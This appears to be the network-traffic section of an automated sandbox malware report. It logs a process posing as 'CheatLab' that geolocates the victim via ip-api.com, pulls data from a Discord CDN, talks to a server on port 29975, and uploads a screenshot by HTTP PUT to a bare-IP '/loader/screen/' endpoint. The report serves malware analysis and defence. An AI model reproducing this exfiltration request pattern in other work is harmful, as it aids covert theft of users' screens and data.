                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.836965084 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.836987972 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.838171959 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.838186979 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.838241100 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.838248968 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.838287115 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.839461088 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.839476109 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.839523077 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.839530945 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.839569092 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.840926886 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.840959072 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.841007948 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.841015100 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.841036081 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.841049910 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.841398001 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.842993975 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.843012094 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.843072891 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.843080997 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.843118906 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.844070911 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.844090939 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.844130993 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.844139099 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.844167948 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.844183922 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.845172882 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.845189095 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.845233917 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.845242023 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.845278978 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.847843885 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.847867966 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.847893000 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.847898006 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.847923040 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.847939014 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.848664999 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.848680019 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.848721027 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.848726988 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.848809004 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.849520922 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.849535942 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.849577904 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.849585056 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.849646091 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.850840092 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.850856066 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.850882053 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.850888968 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.850915909 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.850941896 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.852211952 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.852226973 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.852279902 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.852286100 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.852478027 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.853656054 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.853672028 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.853718042 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.853724957 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.853745937 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.853760958 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.855067015 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.855084896 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.855123043 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.855129957 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.855149984 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.855165958 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.856467962 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.856482983 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.856529951 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.856535912 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.856575966 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.857908964 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.857923985 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.857973099 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.857979059 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.858036041 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.859205961 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.859220028 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.859267950 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.859275103 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.859338999 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.860933065 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.860955954 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.861005068 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.861011982 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.861115932 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.861967087 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.861980915 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.862016916 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.862025023 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.862057924 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.862082958 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.863699913 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.863713980 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.863771915 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.074445963 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.074491024 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.099720001 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.099744081 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.099761009 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.099843025 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.099848986 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.099874020 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.099929094 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.099934101 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.099952936 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.099988937 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.099993944 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.100045919 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.100044012 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.100091934 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.100104094 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.100169897 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.100207090 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.306451082 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.307248116 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.406366110 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.406392097 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.406555891 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.410901070 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.410917044 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.411057949 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.452706099 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.459383011 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.522948027 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:24.522998095 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:53.904130936 CET8049729208.95.112.1192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:53.904838085 CET4972980192.168.2.4208.95.112.1
                                                                                                                                                                                                                            Nov 4, 2023 01:35:59.839562893 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:36:00.059740067 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:00.270839930 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:00.272903919 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:36:06.341922045 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:36:06.531196117 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:06.531404972 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:36:06.655009985 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:36:06.869190931 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:06.923969984 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:36:07.651843071 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:36:07.841989040 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:07.892688990 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:36:08.639118910 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:36:08.831286907 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:08.831393003 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:08.831434011 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:08.831473112 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:08.831473112 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:36:08.831510067 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:08.831526995 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:36:08.831543922 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:08.831609964 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:36:10.364609957 CET8049729208.95.112.1192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:17.026108027 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:36:17.215686083 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:17.215816975 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:36:17.216142893 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:17.216209888 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:36:17.216516972 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:17.216584921 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:36:17.405221939 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:17.405242920 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:17.406208038 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:17.406219959 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:17.406229973 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:17.409271955 CET299754974091.103.252.8192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:36:17.455261946 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:36:17.456866026 CET4974029975192.168.2.491.103.252.8
                                                                                                                                                                                                                            Nov 4, 2023 01:37:03.158997059 CET4973780192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:37:03.159290075 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:37:03.251328945 CET8049737162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:37:03.251682997 CET4973780192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:37:03.379519939 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:37:03.379600048 CET4973180192.168.2.4193.37.71.112

                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Nov 4, 2023 01:35:13.300338984 CET6538253192.168.2.41.1.1.1
                                                                                                                                                                                                                            Nov 4, 2023 01:35:13.393853903 CET53653821.1.1.1192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.536148071 CET5194353192.168.2.41.1.1.1
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.629338980 CET53519431.1.1.1192.168.2.4

                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Nov 4, 2023 01:35:13.300338984 CET192.168.2.41.1.1.10x8602Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.536148071 CET192.168.2.41.1.1.10xed9fStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Nov 4, 2023 01:35:13.393853903 CET1.1.1.1192.168.2.40x8602No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.629338980 CET1.1.1.1192.168.2.40xed9fNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.629338980 CET1.1.1.1192.168.2.40xed9fNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.629338980 CET1.1.1.1192.168.2.40xed9fNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.629338980 CET1.1.1.1192.168.2.40xed9fNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Nov 4, 2023 01:35:22.629338980 CET1.1.1.1192.168.2.40xed9fNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false

                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                            • cdn.discordapp.com
                                                                                                                                                                                                                            • ip-api.com

                                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            0192.168.2.449738162.159.129.233443C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            1192.168.2.449729208.95.112.180C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            Nov 4, 2023 01:35:13.556385994 CET0OUTGET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                            User-Agent: Sun
                                                                                                                                                                                                                            Host: ip-api.com
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Nov 4, 2023 01:35:13.651156902 CET1INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Sat, 04 Nov 2023 00:35:12 GMT
                                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                            Content-Length: 112
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            X-Ttl: 60
                                                                                                                                                                                                                            X-Rl: 44
                                                                                                                                                                                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 69 74 79 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 71 75 65 72 79 22 3a 22 31 35 34 2e 31 36 2e 34 39 2e 38 32 22 7d
                                                                                                                                                                                                                            Data Ascii: {"status":"success","countryCode":"US","city":"Washington","timezone":"America/New_York","query":"154.16.49.82"}


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            2192.168.2.449731193.37.71.11280C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            Nov 4, 2023 01:35:14.504067898 CET3OUTPUT /loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=qMhxCagN55R5AwRzdpCrqAg3d
                                                                                                                                                                                                                            User-Agent: Sun
                                                                                                                                                                                                                            Host: 193.37.71.112
                                                                                                                                                                                                                            Content-Length: 3933192
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Nov 4, 2023 01:35:14.505086899 CET15OUTData Raw: 2d 2d 71 4d 68 78 43 61 67 4e 35 35 52 35 41 77 52 7a 64 70 43 72 71 41 67 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                                                            Data Ascii: --qMhxCagN55R5AwRzdpCrqAg3dContent-Type: application/octet-streamContent-Disposition: form-data; name="file"; filename="screen.bmp"BM6($$######$$$$$$$$#
                                                                                                                                                                                                                            Nov 4, 2023 01:35:14.726696014 CET16OUTData Raw: 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00
                                                                                                                                                                                                                            Data Ascii: vlg$$#################################
                                                                                                                                                                                                                            Nov 4, 2023 01:35:14.727883101 CET36OUTData Raw: 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18
                                                                                                                                                                                                                            Data Ascii: ###########################""""""""""""""""""""""#####################"""###"""""
                                                                                                                                                                                                                            Nov 4, 2023 01:35:14.728010893 CET39OUTData Raw: 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f
                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                            Nov 4, 2023 01:35:14.965866089 CET74OUTData Raw: 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18
                                                                                                                                                                                                                            Data Ascii: """""""""""""#####################"""""""""""""""""""""""""""""""""""""""""""""""
                                                                                                                                                                                                                            Nov 4, 2023 01:35:15.186659098 CET90OUTData Raw: 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e
                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                            Nov 4, 2023 01:35:15.186903954 CET95OUTData Raw: 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e
                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                            Nov 4, 2023 01:35:15.186965942 CET98OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 2b 75 b5 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b b5 75 2b f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                                                                                                                                                            Data Ascii: +u++++++++++++++++++u++Ru
                                                                                                                                                                                                                            Nov 4, 2023 01:35:15.187248945 CET100OUTData Raw: 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e
                                                                                                                                                                                                                            Data Ascii:
